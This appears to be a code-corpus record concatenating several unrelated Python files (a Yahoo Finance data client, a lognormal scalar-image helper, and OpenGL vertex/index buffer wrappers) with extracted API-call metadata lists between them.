"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.array",
"numpy.random.randint",
"matplotlib.pyplot.bar",
"matplotlib.pyplot.scatter",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.leg... | [((145, 177), 'numpy.random.randint', 'np.random.randint', (['(100)'], {'size': '(100)'}), '(100, size=100)\n', (162, 177), True, 'import numpy as np\n'), ((184, 216), 'numpy.random.randint', 'np.random.randint', (['(100)'], {'size': '(100)'}), '(100, size=100)\n', (201, 216), True, 'import numpy as np\n'), ((219, 265), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'y'], {'c': '"""tab:blue"""', 'label': '"""stuff"""'}), "(x, y, c='tab:blue', label='stuff')\n", (230, 265), True, 'import matplotlib.pyplot as plt\n'), ((266, 283), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '(2)'}), '(loc=2)\n', (276, 283), True, 'import matplotlib.pyplot as plt\n'), ((316, 367), 'numpy.array', 'np.array', (['[10, 20, 30, 40, 50, 60, 70, 80, 90, 100]'], {}), '([10, 20, 30, 40, 50, 60, 70, 80, 90, 100])\n', (324, 367), True, 'import numpy as np\n'), ((372, 423), 'numpy.array', 'np.array', (['[10, 20, 30, 40, 50, 60, 70, 80, 90, 100]'], {}), '([10, 20, 30, 40, 50, 60, 70, 80, 90, 100])\n', (380, 423), True, 'import numpy as np\n'), ((424, 466), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y'], {'c': '"""tab:green"""', 'label': '"""aaa"""'}), "(x, y, c='tab:green', label='aaa')\n", (432, 466), True, 'import matplotlib.pyplot as plt\n'), ((467, 515), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '"""-o"""'], {'c': '"""tab:green"""', 'label': '"""aaa"""'}), "(x, y, '-o', c='tab:green', label='aaa')\n", (475, 515), True, 'import matplotlib.pyplot as plt\n'), ((564, 576), 'numpy.arange', 'np.arange', (['(3)'], {}), '(3)\n', (573, 576), True, 'import numpy as np\n'), ((577, 605), 'matplotlib.pyplot.bar', 'plt.bar', (['x'], {'height': '[1, 2, 3]'}), '(x, height=[1, 2, 3])\n', (584, 605), True, 'import matplotlib.pyplot as plt\n'), ((604, 634), 'matplotlib.pyplot.xticks', 'plt.xticks', (['x', "['a', 'b', 'c']"], {}), "(x, ['a', 'b', 'c'])\n", (614, 634), True, 'import matplotlib.pyplot as plt\n'), ((633, 648), 'matplotlib.pyplot.ylabel', 
'plt.ylabel', (['"""y"""'], {}), "('y')\n", (643, 648), True, 'import matplotlib.pyplot as plt\n'), ((649, 664), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""x"""'], {}), "('x')\n", (659, 664), True, 'import matplotlib.pyplot as plt\n'), ((727, 749), 'numpy.array', 'np.array', (['[40, 30, 70]'], {}), '([40, 30, 70])\n', (735, 749), True, 'import numpy as np\n'), ((790, 817), 'numpy.random.normal', 'np.random.normal', ([], {'size': '(1000)'}), '(size=1000)\n', (806, 817), True, 'import numpy as np\n'), ((831, 846), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)'], {}), '(2)\n', (843, 846), True, 'import matplotlib.pyplot as plt\n')] |
from . import core
import io
import re
import requests
import pytz
import time
import datetime as dt
import dateutil.parser as du
import numpy as np
import pandas as pd
from typing import Tuple, Dict, List, Union, ClassVar, Any, Optional, Type
import types
class AccessModeInQuery(core.API):
    # Enumeration class to list available API access modes.
    # The values double as the endpoint path segment used by Session
    # (https://query1.finance.yahoo.com/v7/finance/<mode>/).
    NONE = 'n/a';
    DOWNLOAD = 'download';
    CHART = 'chart';
    DEFAULT = 'download';
class EventsInQuery(core.API):
    """
    Enumeration of the event types that can be requested.

    The values map onto the `events` query parameter of the Yahoo Finance
    endpoints: price history, dividends, or splits.
    """
    NONE = '';
    HISTORY = 'history';
    DIVIDENDS = 'div';
    SPLITS = 'split';
class Query():
    """
    Encodes the request parameters of a Yahoo Finance query.

    The setters validate each parameter against what the selected API
    ('download' or 'chart') accepts; str() renders the final query string,
    skipping parameters that failed validation (stored as None).
    """
    # Legal values accepted by the Yahoo Finance v7 endpoints.
    __events__:ClassVar[List[str]] = ["history", "split", "div"]
    __chart_range__:ClassVar[List[str]] = ["1d", "5d", "1mo", "3mo", "6mo", "1y", "2y", "5y", "10y", "ytd", "max"]
    __chart_interval__:ClassVar[List[str]] = ["1m", "2m", "5m", "15m", "30m", "60m", "90m", "1h", "1d", "5d", "1wk", "1mo", "3mo"]
    __download_frequency__:ClassVar[List[str]] = ["1d", "1wk", "1mo"]

    def __init__(self, using_api:'Type[AccessModeInQuery]'):
        self.query:Dict[str,Optional[str]] = {}
        self.__api__:'AccessModeInQuery' = using_api

    def __str__(self):
        # "key=value&..." over the parameters that validated successfully.
        return "&".join([f"{param}={value}" for param, value in self.query.items() if value is not None]) if len(self.query) > 0 else ""

    def __len__(self):
        return len(self.query)

    def __bool__(self):
        return len(self.query) > 0

    def SetEvents(self, events:'Type[EventsInQuery]') -> None:
        """Validate and store the 'events' parameter for the current API.

        Raises:
            TypeError: if events is not an EventsInQuery member.
            ValueError: if the current API takes no 'events' parameter.
        """
        if not isinstance(events, EventsInQuery):
            self.query['events'] = None
            raise TypeError(f"invalid type for the argument 'events'; <class 'EventsInQuery'> expected, got {type(events)}")
        else:
            if self.__api__ is AccessModeInQuery.CHART:
                # The chart API only understands 'div'/'split'.
                self.query['events'] = events if events not in [EventsInQuery.HISTORY, EventsInQuery.NONE] else None
            elif self.__api__ is AccessModeInQuery.DOWNLOAD:
                # The download API defaults to price history.
                self.query['events'] = events if events is not EventsInQuery.NONE else str(EventsInQuery.HISTORY)
            else:
                self.query['events'] = None
                raise ValueError(f"value of argument 'events' is not compatible with the given API '{str(self.__api__)}'")

    def SetInterval(self, interval:str) -> None:
        """Validate and store the sampling interval for the current API.

        Raises:
            TypeError: if interval is not a string.
            ValueError: if the interval is not legal for the current API.
        """
        if not isinstance(interval, str):
            self.query['interval'] = None
            raise TypeError(f"invalid type for the argument 'interval'; {type(str)} expected, got {type(interval)}")
        else:
            if (self.__api__ is AccessModeInQuery.CHART and interval in self.__chart_interval__) \
                or (self.__api__ is AccessModeInQuery.DOWNLOAD and interval in self.__download_frequency__):
                self.query['interval'] = interval
            else:
                self.query['interval'] = None
                raise ValueError(f"value of argument 'interval' is not compatible with the given API '{str(self.__api__)}'")

    def SetPeriod(self, period:Union[str,dt.datetime,List[Union[int,dt.datetime]]]) -> None:
        """Validate and store the time span of the query.

        Accepts a [start, end] pair (ints, datetimes or ISO strings), a named
        chart range such as '1mo' (chart API only), or a single datetime.

        Raises:
            TypeError: if period has none of the accepted shapes.
            ValueError: if a named range is used with a non-chart API.
        """
        # BUGFIX: the original passed a lambda object (always truthy) to all(),
        # so element types were never actually checked, and compared the
        # length with `is`, which relies on small-int identity.
        if isinstance(period,list) and len(period) == 2 and all(isinstance(p,(int,dt.datetime,str)) for p in period):
            self.query['period1'], self.query['period2'] = self.__parse_periods__(*(period))
        elif isinstance(period,str):
            if self.__api__ is AccessModeInQuery.CHART and period in self.__chart_range__:
                self.query['range'] = period
            else:
                raise ValueError(f"value of argument 'period' is not compatible with the given API '{str(self.__api__)}'")
        elif isinstance(period,dt.datetime):
            self.query['period1'], self.query['period2'] = self.__parse_periods__(period,period)
        else:
            self.query['period1'], self.query['period2'], self.query['range'] = None, None, None
            raise TypeError(f"invalid type for the argument 'period'; {type(str)} or {type(dt.datetime)} or a list of either {type(int)} or {type(dt.datetime)} expected, got {type(period)}")

    @classmethod
    def __parse_periods__(cls, value1:Union[dt.datetime,int,str], value2:Union[dt.datetime,int,str]) -> Tuple[int,int]:
        """Convert two period bounds into ordered, non-negative epoch seconds.

        For compatibility reasons timestamps prior to epoch 0 are clamped to
        0, and the end bound is clamped to be >= the start bound.
        """
        if isinstance(value1,str):
            try:
                period1 = int(du.isoparse(value1).timestamp())
            except (OSError,OverflowError):
                period1 = 0
        else:
            period1 = max(0,(int(time.mktime(value1.timetuple())))) if isinstance(value1, dt.datetime) else max(0,value1)
        if value1 == value2:
            # BUGFIX: was `period2 = period2`, an unbound-local reference.
            period2 = period1
        elif isinstance(value2,str):
            try:
                period2 = int(du.isoparse(value2).timestamp())
            except (OSError,OverflowError):
                period2 = dt.datetime.now().timestamp()
        else:
            period2 = max(period1,int(time.mktime(value2.timetuple()))) if isinstance(value2, dt.datetime) else max(period1,value2)
        return period1, period2
class Response:
    """
    Parses and processes responses sent back by the Yahoo Finance API.

    Feed the raw HTTP response to the constructor, then call Parse() to
    retrieve the decoded payload in a shape matching the 'AccessModeInQuery'
    API the request was made with ('chart' JSON or 'download' CSV).
    """
    def __init__(self, input:'Type[requests.models.Response]'):
        # Decoded pieces of the payload; filled below according to the
        # detected response format ('chart' JSON, 'finance' JSON, or CSV).
        self.__format__:str = ""
        self.__error__:Optional[Dict[str, str]] = None
        self.__meta__:Optional[Dict[str, Union[str, int, float]]] = None
        self.__timestamps__:Optional[List[dt.datetime]] = None
        self.__quotes__:Optional[pd.DataFrame] = None
        self.__events__:Optional[pd.DataFrame] = None
        self.__data__:Optional[Union[pd.DataFrame,dict]] = None

        def is_json() -> bool:
            # On success, rebinds `input` to the decoded JSON object.
            nonlocal input
            try:
                input = input.json(parse_float=float, parse_int=int)
            except ValueError:
                return False
            else:
                return True

        if is_json():
            if 'chart' in input.keys():
                self.__format__ = 'chart'
                if 'error' in input['chart'].keys():
                    self.__error__ = self.__response_parser__(input['chart']['error'])
                if self.__error__ is None:
                    data = input['chart']['result'][0]
                    self.__error__ = {'code': "ok", 'description': "success!"}
                    self.__meta__ = self.__response_parser__(data['meta'])
                    # Timestamps arrive as epoch seconds -> sorted UTC index.
                    self.__timestamps__ = pd.DatetimeIndex(
                        list(map(dt.datetime.utcfromtimestamp, sorted(data['timestamp']))),
                        name=f"Date ({pytz.utc})")
                    quote = data['indicators']['quote'][0]
                    self.__quotes__ = pd.DataFrame({
                        'Open':      np.array(quote['open']),
                        'High':      np.array(quote['high']),
                        'Low':       np.array(quote['low']),
                        'Close':     np.array(quote['close']),
                        # 'adjclose' is not always present; pad with NaN.
                        # (np.nan, not np.NaN, which NumPy 2.0 removed.)
                        'Adj Close': np.array(data['indicators']['adjclose'][0]['adjclose'])
                                     if 'adjclose' in data['indicators'].keys()
                                     else np.full(len(quote['close']), np.nan),
                        'Volume':    np.array(quote['volume'])},
                        index=self.__timestamps__)
                    if 'events' in data.keys():
                        index = list()
                        entries = list()
                        columns = list()
                        if 'splits' in data['events'].keys():
                            for split in data['events']['splits'].values():
                                index.append(split['date'])
                                entries.append([split['numerator'], split['denominator'],
                                                split['denominator']/split['numerator']])
                            columns = ['From', 'To', 'Split Ratio']
                        elif 'dividends' in data['events'].keys():
                            for dividend in data['events']['dividends'].values():
                                index.append(dividend['date'])
                                entries.append(dividend['amount'])
                            columns = ['Dividends']
                        # BUGFIX: the original sorted only the timestamps, which
                        # could misalign rows and dates; sort them together.
                        pairs = sorted(zip(index, entries), key=lambda p: p[0])
                        idx = pd.DatetimeIndex(
                            [dt.datetime.utcfromtimestamp(ts).date() for ts, _ in pairs],
                            name=f"Date ({pytz.utc})")
                        self.__events__ = pd.DataFrame([row for _, row in pairs],
                                                       index=idx, columns=columns)
            elif 'finance' in input.keys():
                self.__format__ = 'finance'
                if 'error' in input['finance'].keys():
                    self.__error__ = self.__response_parser__(input['finance']['error'])
                if self.__error__ is None:
                    self.__data__ = self.__response_parser__(input['finance'])
        else:
            # Plain-text response: the 'download' API returns CSV quotes.
            self.__format__ = 'finance'
            self.__error__ = {'code': "ok", 'description': "success!"}
            self.__data__ = pd.read_csv(io.StringIO(input.text),
                                        index_col=0, parse_dates=True).sort_index()

    def Parse(self) -> Dict[str,Any]:
        """Return the decoded payload keyed by the originating API.

        'chart' -> meta/quotes/events/error, 'download' -> data/error,
        anything else -> an 'unknown' marker with an error dict.
        """
        if self.__format__ == 'chart':
            return {'api':'chart', 'meta':self.__meta__, 'quotes':self.__quotes__, 'events':self.__events__, 'error':self.__error__}
        elif self.__format__ == 'finance':
            return {'api':'download', 'data':self.__data__, 'error':self.__error__}
        else:
            return {'api': 'unknown', 'error':{'code':"0", 'description':"invalid API"} }

    @classmethod
    def __response_parser__(cls, d:Any) -> Any:
        """Recursively convert numeric-looking strings to floats.

        The literal string "null" becomes None; dicts and lists are converted
        element-wise; anything unconvertible is returned unchanged.
        """
        if d == "null":  # BUGFIX: was `d is "null"`, an identity test that
            return None  # (almost) never matches a parsed JSON string.
        elif isinstance(d,dict):
            return {key:cls.__response_parser__(value) for key, value in d.items()}
        elif isinstance(d,list):
            try:
                return list(map(float, d))
            except (TypeError, ValueError):
                return d
        elif isinstance(d,str):
            try:
                return float(d)
            except (TypeError, ValueError):
                return d
        else:
            return d
class Session:
"""
A lower level class that explicitly requests data to Yahoo Finance via HTTP.
I provides two 'public' methods:
- With(...): to set the favorite access mode;
- Get(...): to explicitly push request to Yahoo.
It implements a recursive call to the HTTP 'GET' method in case of failure.
The maximum number of attempts has been hardcodedly set to 10.
"""
__yahoo_finance_url__:str = "";
__yahoo_finance_api__:Type[AccessModeInQuery] = AccessModeInQuery.NONE;
    def __init__(self):
        """Declare the per-session state (refresh timestamp, cookies, crumb).

        NOTE(review): these are bare annotations, not assignments — no
        attribute is actually created here; __start__() populates them.
        """
        self.__last_time_checked__ : dt.datetime;
        self.__cookies__ : Type[requests.cookies.RequestsCookieJar];
        self.__crumb__ : str;
    @classmethod
    def With(cls, this_api:Type[AccessModeInQuery]) -> 'Session':
        """Build a started Session bound to the given access mode.

        Sets the class-level API and endpoint URL, then instantiates a
        Session and fetches the Yahoo cookie/crumb pair via __start__().

        Raises:
            TypeError: if this_api is not an AccessModeInQuery member.
        """
        if not isinstance(this_api,AccessModeInQuery):
            raise TypeError(f"invalid type for the argument 'this_api'; <class 'AccessModeInQuery'> expected, got {type(this_api)}.");
        else:
            cls.__set_api__(this_api);
            cls.__set_url__();
            session = cls();
            session.__start__();
            return session;
    @classmethod
    def __set_url__(cls) -> None:
        """Derive the v7 endpoint URL from the class-level API mode.

        Raises:
            UnboundLocalError: if the API mode has not been set yet.
        """
        if cls.__yahoo_finance_api__ is not AccessModeInQuery.NONE:
            cls.__yahoo_finance_url__ = f"https://query1.finance.yahoo.com/v7/finance/{cls.__yahoo_finance_api__}/";
        else:
            raise UnboundLocalError("session's api has not been set yet");
    @classmethod
    def __set_api__(cls, input_api:Type[AccessModeInQuery]=AccessModeInQuery.DEFAULT) -> None:
        """Set the class-level API mode; NONE falls back to DEFAULT."""
        if cls.__yahoo_finance_api__ is not input_api:
            cls.__yahoo_finance_api__ = input_api if input_api is not AccessModeInQuery.NONE else AccessModeInQuery.DEFAULT;
        #else:
        #    print(f"*INFO: the session 'api' was already '{input_api}'.");
    def __start__(self) -> None:
        """Fetch Yahoo's 'B' cookie and the matching CrumbStore crumb.

        Scrapes the SPY history page, keeps its 'B' cookie, extracts the
        crumb token embedded in the page source, and records the fetch time
        so __refresh__() can expire the session after 5 minutes.
        """
        r = requests.get('https://finance.yahoo.com/quote/SPY/history');
        self.__cookies__ = requests.cookies.cookiejar_from_dict({'B': r.cookies['B']});
        # The crumb lives in an inline JSON blob: "CrumbStore":{"crumb":"..."}
        pattern = re.compile(r'.*"CrumbStore":\{"crumb":"(?P<crumb>[^"]+)"\}');
        for line in r.text.splitlines():
            crumb_match = pattern.match(line)
            if crumb_match is not None:
                self.__crumb__ = crumb_match.groupdict()['crumb'];
                break;
        self.__last_time_checked__ = dt.datetime.now();
    def __restart__(self) -> None:
        """Drop the current cookie/crumb state and fetch a fresh pair."""
        self.__abandon__();
        self.__start__();
def __refresh__(self, force:bool=False) -> None:
if force:
self.__restart__();
else:
if self.__last_time_checked__ is not None:
current_time = dt.datetime.now()
delta_secs = (current_time - self.__last_time_checked__).total_seconds()
if delta_secs > 300: # 300 = 5 minutes
self.__restart__();
    def __abandon__(self) -> None:
        """Forget the session state so the next __start__() begins clean."""
        self.__cookies__ = None;
        self.__crumb__ = "";
        self.__last_time_checked__ = None;
def Get(self, ticker:str, params:Type[Query], attempt:int=0, timeout:int=10, last_error:str="") -> Tuple[bool, dict]:
if not isinstance(ticker,str):
raise TypeError(f"invalid type for the argument 'ticker'! {type(str)} expected; got {type(ticker)}");
if not isinstance(params, Query):
raise TypeError(f"invalid type for the argument 'params'! <class 'Query'> expected; got {type(params)}");
if attempt<10:
query = f"?{str(params)}&crumb={self.__crumb__}" if params else f"?crumb={self.__crumb__}";
url = self.__yahoo_finance_url__ + ticker + query;
try:
response = requests.get(url, cookies=self.__cookies__)
response.raise_for_status();
except requests.HTTPError as e:
if response.status_code in [408, 409, 429]:
time.sleep(timeout);
self.__refresh__();
return self.Get(ticker,params,attempt=attempt+1,timeout=timeout+1,last_error=str(e))
elif response.status_code in [401, 404, 422]:
r = Response(response).Parse();
if r['error']['description'] == "Invalid cookie":
self.__refresh__(force=True);
return self.Get(ticker,params,attempt=attempt+1,timeout=timeout+5,last_error=r['error']['description'])
else:
return True, dict({'code': r['error']['code'], 'description': f"{r['error']['description']} (attempt: {attempt})"});
else :
m = re.match(r'^(?P<code>\d{3})\s?\w*\s?Error\s?:\s?(?P<description>.+)$', str(e));
return True, dict({'code': m['code'], 'description': f"{m['description']} (attempt: {attempt})"});
except requests.Timeout as e:
time.sleep(timeout);
self.__refresh__();
return self.Get(ticker,params,attempt=attempt+1,timeout=timeout+1,last_error=str(e))
except requests.RequestException as e:
if re.search(r"^\s*Invalid\s?URL", str(e)):
time.sleep(timeout);
self.__refresh__();
return self.Get(ticker,params,attempt=attempt+1,timeout=timeout+1,last_error=str(e));
else:
return True, dict({'code': "-1", 'description': f"{str(e)} (attempt: {attempt})"});
else:
r = Response(response).Parse();
if r['error'] is not None and r['error']['code'] is not "ok":
return True, dict({'code': r['error']['code'], 'description': f"{r['error']['description']} (attempt: {attempt})"});
else:
return False, r;
else:
return True, dict({'code': "-2", 'description': "{}\nThe maximum number of attempts has been exceeded!".format(last_error)});
| [
"datetime.datetime.utcfromtimestamp",
"requests.cookies.cookiejar_from_dict",
"dateutil.parser.isoparse",
"re.compile",
"time.sleep",
"requests.get",
"datetime.datetime.now",
"numpy.array",
"pandas.DataFrame",
"io.StringIO"
] | [((12645, 12704), 'requests.get', 'requests.get', (['"""https://finance.yahoo.com/quote/SPY/history"""'], {}), "('https://finance.yahoo.com/quote/SPY/history')\n", (12657, 12704), False, 'import requests\n'), ((12733, 12792), 'requests.cookies.cookiejar_from_dict', 'requests.cookies.cookiejar_from_dict', (["{'B': r.cookies['B']}"], {}), "({'B': r.cookies['B']})\n", (12769, 12792), False, 'import requests\n'), ((12812, 12873), 're.compile', 're.compile', (['""".*"CrumbStore":\\\\{"crumb":"(?P<crumb>[^"]+)"\\\\}"""'], {}), '(\'.*"CrumbStore":\\\\{"crumb":"(?P<crumb>[^"]+)"\\\\}\')\n', (12822, 12873), False, 'import re\n'), ((13128, 13145), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (13143, 13145), True, 'import datetime as dt\n'), ((13445, 13462), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (13460, 13462), True, 'import datetime as dt\n'), ((14458, 14501), 'requests.get', 'requests.get', (['url'], {'cookies': 'self.__cookies__'}), '(url, cookies=self.__cookies__)\n', (14470, 14501), False, 'import requests\n'), ((15674, 15693), 'time.sleep', 'time.sleep', (['timeout'], {}), '(timeout)\n', (15684, 15693), False, 'import time\n'), ((9116, 9167), 'pandas.DataFrame', 'pd.DataFrame', (['entries'], {'index': 'index', 'columns': 'columns'}), '(entries, index=index, columns=columns)\n', (9128, 9167), True, 'import pandas as pd\n'), ((9690, 9713), 'io.StringIO', 'io.StringIO', (['input.text'], {}), '(input.text)\n', (9701, 9713), False, 'import io\n'), ((14671, 14690), 'time.sleep', 'time.sleep', (['timeout'], {}), '(timeout)\n', (14681, 14690), False, 'import time\n'), ((15963, 15982), 'time.sleep', 'time.sleep', (['timeout'], {}), '(timeout)\n', (15973, 15982), False, 'import time\n'), ((4874, 4893), 'dateutil.parser.isoparse', 'du.isoparse', (['value1'], {}), '(value1)\n', (4885, 4893), True, 'import dateutil.parser as du\n'), ((7280, 7328), 'numpy.array', 'np.array', (["data['indicators']['quote'][0]['open']"], {}), 
"(data['indicators']['quote'][0]['open'])\n", (7288, 7328), True, 'import numpy as np\n'), ((7367, 7415), 'numpy.array', 'np.array', (["data['indicators']['quote'][0]['high']"], {}), "(data['indicators']['quote'][0]['high'])\n", (7375, 7415), True, 'import numpy as np\n'), ((7454, 7501), 'numpy.array', 'np.array', (["data['indicators']['quote'][0]['low']"], {}), "(data['indicators']['quote'][0]['low'])\n", (7462, 7501), True, 'import numpy as np\n'), ((7540, 7589), 'numpy.array', 'np.array', (["data['indicators']['quote'][0]['close']"], {}), "(data['indicators']['quote'][0]['close'])\n", (7548, 7589), True, 'import numpy as np\n'), ((7911, 7961), 'numpy.array', 'np.array', (["data['indicators']['quote'][0]['volume']"], {}), "(data['indicators']['quote'][0]['volume'])\n", (7919, 7961), True, 'import numpy as np\n'), ((5262, 5281), 'dateutil.parser.isoparse', 'du.isoparse', (['value2'], {}), '(value2)\n', (5273, 5281), True, 'import dateutil.parser as du\n'), ((5366, 5383), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (5381, 5383), True, 'import datetime as dt\n'), ((7628, 7683), 'numpy.array', 'np.array', (["data['indicators']['adjclose'][0]['adjclose']"], {}), "(data['indicators']['adjclose'][0]['adjclose'])\n", (7636, 7683), True, 'import numpy as np\n'), ((8989, 9021), 'datetime.datetime.utcfromtimestamp', 'dt.datetime.utcfromtimestamp', (['ts'], {}), '(ts)\n', (9017, 9021), True, 'import datetime as dt\n')] |
import numpy as np
import matplotlib.pyplot as plt
from copy import deepcopy
from ..measure import ConditionedLognormalSampler
class ScalarImage:
    """A 2-D scalar-valued image with fill, rendering and coordinate helpers."""
    def __init__(self, height=1000, width=1000):
        """Create a blank image of shape (<height>, <width>)."""
        self.height = height
        self.width = width
        self.initialize()
    @property
    def shape(self):
        """Spatial shape of the image (last two axes)."""
        return self.im.shape[-2:]
    @property
    def pixels(self):
        """Flattened pixel values."""
        return self.im.ravel()
    @property
    def max(self):
        """Largest pixel intensity."""
        return self.im.max()
    @property
    def im_normalized(self):
        """Image scaled so the brightest pixel equals one."""
        return self.im / self.max
    def percentile(self, q):
        """Return the q-th percentile of the pixel intensities."""
        return np.percentile(self.pixels, q=q)
    def initialize(self):
        """Reset the image to all zeros (float64)."""
        self.im = np.zeros((self.height, self.width), dtype=np.float64)
    def fill(self, mu=0.1, sigma=0.1):
        """Fill the image with lognormally distributed noise.

        Args:
            mu (float) - mean of underlying normal distribution
            sigma (float) - std dev of underlying normal distribution
        """
        log_samples = np.random.normal(np.log(mu), sigma, size=self.shape)
        self.im[:, :] = np.exp(log_samples)
    @staticmethod
    def _render(im, vmin=0, vmax=None, cmap=plt.cm.Greys, size=5, ax=None):
        """Draw <im> onto <ax>, creating a new figure when <ax> is None.

        Args:
            im (np.ndarray[float]) - image
            vmin, vmax (int) - colormap bounds
            cmap (matplotlib.ColorMap or str) - 'r', 'g' or 'b' selects a single RGB channel
            size (int) - image panel size, in inches
            ax (matplotlib.axes.AxesSubplot) - target axes
        """
        if ax is None:
            _, ax = plt.subplots(figsize=(size, size))
        if vmax is None:
            vmax = im.max()
        # Render either into one RGB channel or through the given colormap.
        if type(cmap) == str:
            assert cmap in 'rgb', 'Color not recognized.'
            rgb = np.zeros(im.shape + (3,), dtype=np.float64)
            rgb[:, :, 'rgb'.index(cmap)] = (im - vmin) / (vmax - vmin)
            rgb[rgb > 1.] = 1.
            ax.imshow(rgb)
        else:
            ax.imshow(im, vmin=vmin, vmax=vmax, cmap=cmap)
        # Invert the y axis and hide ticks for image-style display.
        ax.invert_yaxis()
        ax.axis('off')
    def render(self, **kwargs):
        """Render the image (transposed so x runs along the horizontal axis)."""
        self._render(self.im.T, **kwargs)
    def render_blank(self, **kwargs):
        """Render an all-zero image of the same shape."""
        self._render(np.zeros(self.shape, dtype=int), **kwargs)
    def center_xycoords(self, xy, shrinkage=0.9):
        """Map zero-centered unit coordinates onto integer pixel positions."""
        half_x, half_y = self.shape[0] / 2, self.shape[1] / 2
        projected = deepcopy(xy)
        projected[:, 0] = xy[:, 0] * half_x * shrinkage + half_x
        projected[:, 1] = xy[:, 1] * half_y * shrinkage + half_y
        return projected.astype(int)
class DependentScalarImage(ScalarImage):
    """A scalar image whose pixels are sampled conditionally upon another scalar image."""
    def __init__(self, pixels, mean, sigma):
        """Build a lognormal sampler conditioned on the log of <pixels>."""
        super().__init__(*pixels.shape)
        log_pixels = np.log(pixels.ravel())
        self.sampler = ConditionedLognormalSampler(log_pixels, np.log(mean), sigma)
    def fill(self, rho=0.0):
        """Draw a sample with correlation <rho> and store it as the image."""
        sample = self.sampler.sample(rho=rho)
        self.im[:, :] = sample.reshape(self.shape)
| [
"numpy.zeros",
"numpy.log",
"matplotlib.pyplot.subplots",
"copy.deepcopy"
] | [((1067, 1120), 'numpy.zeros', 'np.zeros', (['(self.height, self.width)'], {'dtype': 'np.float64'}), '((self.height, self.width), dtype=np.float64)\n', (1075, 1120), True, 'import numpy as np\n'), ((3047, 3059), 'copy.deepcopy', 'deepcopy', (['xy'], {}), '(xy)\n', (3055, 3059), False, 'from copy import deepcopy\n'), ((2046, 2080), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(size, size)'}), '(figsize=(size, size))\n', (2058, 2080), True, 'import matplotlib.pyplot as plt\n'), ((2268, 2311), 'numpy.zeros', 'np.zeros', (['(im.shape + (3,))'], {'dtype': 'np.float64'}), '(im.shape + (3,), dtype=np.float64)\n', (2276, 2311), True, 'import numpy as np\n'), ((2798, 2829), 'numpy.zeros', 'np.zeros', (['self.shape'], {'dtype': 'int'}), '(self.shape, dtype=int)\n', (2806, 2829), True, 'import numpy as np\n'), ((3646, 3658), 'numpy.log', 'np.log', (['mean'], {}), '(mean)\n', (3652, 3658), True, 'import numpy as np\n'), ((1459, 1469), 'numpy.log', 'np.log', (['mu'], {}), '(mu)\n', (1465, 1469), True, 'import numpy as np\n')] |
from ...Renderer.Buffer import VertexBuffer, IndexBuffer, BufferLayout
from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData
from OpenGL.GL import GL_ARRAY_BUFFER, GL_STATIC_DRAW, GL_ELEMENT_ARRAY_BUFFER, GL_DYNAMIC_DRAW
import ctypes
import numpy as np
from multipledispatch import dispatch
class OpenGLVertexBuffer(VertexBuffer):
    """OpenGL vertex buffer object (VBO).

    ``multipledispatch`` selects the constructor at runtime: a ``list``
    argument uploads the vertices immediately (GL_STATIC_DRAW), while an
    ``int`` reserves storage for later ``SetData`` calls (GL_DYNAMIC_DRAW).
    """
    __slots__ = "__RendererID", "__itemsize", \
        "__Layout"
    @dispatch(list)
    def __init__(self, vertices: list) -> None:
        """Create a static VBO pre-filled with *vertices* (as float32)."""
        vertices: np.ndarray = np.array(vertices, dtype=np.float32)
        self.__itemsize = vertices.itemsize
        # GL state machine: generate a handle, bind it, then upload into
        # the currently bound GL_ARRAY_BUFFER.
        self.__RendererID = glGenBuffers(1)
        glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
        glBufferData(GL_ARRAY_BUFFER, vertices.nbytes, vertices, GL_STATIC_DRAW)
    @dispatch(int)
    def __init__(self, size: int) -> None:
        """Allocate storage for *size* elements without uploading any data."""
        vertices = np.zeros((size,))
        # NOTE(review): this stores the element count, while the list
        # overload stores the per-element byte size — confirm intended.
        self.__itemsize = size
        self.__RendererID = glGenBuffers(1)
        glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
        # Null data pointer: reserve storage only; contents come via SetData.
        glBufferData(GL_ARRAY_BUFFER, vertices.nbytes, ctypes.c_void_p(None), GL_DYNAMIC_DRAW)
    def __del__(self) -> None:
        # Release the GL buffer handle when the wrapper is collected.
        glDeleteBuffers(1, [self.__RendererID])
    @property
    def itemsize(self) -> int:
        """Value stored at construction (itemsize or element count, see __init__)."""
        return self.__itemsize
    @property
    def RendererID(self) -> int:
        """The OpenGL buffer handle."""
        return self.__RendererID
    def Bind(self) -> None:
        """Bind this buffer to GL_ARRAY_BUFFER."""
        glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
    def Unbind(self) -> None:
        """Unbind any buffer from GL_ARRAY_BUFFER."""
        glBindBuffer(GL_ARRAY_BUFFER, 0)
    def SetLayout(self, layout: BufferLayout) -> None:
        """Remember the vertex attribute layout for this buffer."""
        self.__Layout = layout
    def SetData(self, data: np.ndarray) -> None:
        """Upload *data* into the buffer, starting at offset 0."""
        glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
        glBufferSubData(GL_ARRAY_BUFFER, 0, data.nbytes, data.tobytes())
    @property
    def Layout(self) -> BufferLayout:
        """The vertex attribute layout previously set via SetLayout."""
        return self.__Layout
class OpenGLIndexBuffer(IndexBuffer):
    """OpenGL index (element) buffer object holding uint32 indices."""
    # GL buffer handle
    __RendererID : int
    # number of indices stored in the buffer
    __Count : int
    def __init__(self, indices: list) -> None:
        """Create and fill a static element buffer from *indices*."""
        indices: np.ndarray = np.array(indices, dtype=np.uint32)
        self.__Count = len(indices)
        self.__RendererID = glGenBuffers(1)
        # Bind first: glBufferData uploads into the currently bound target.
        self.Bind()
        glBufferData(GL_ELEMENT_ARRAY_BUFFER, indices.nbytes, indices, GL_STATIC_DRAW)
    def __del__(self) -> None:
        # Release the GL buffer handle when the wrapper is collected.
        glDeleteBuffers(1, [self.__RendererID])
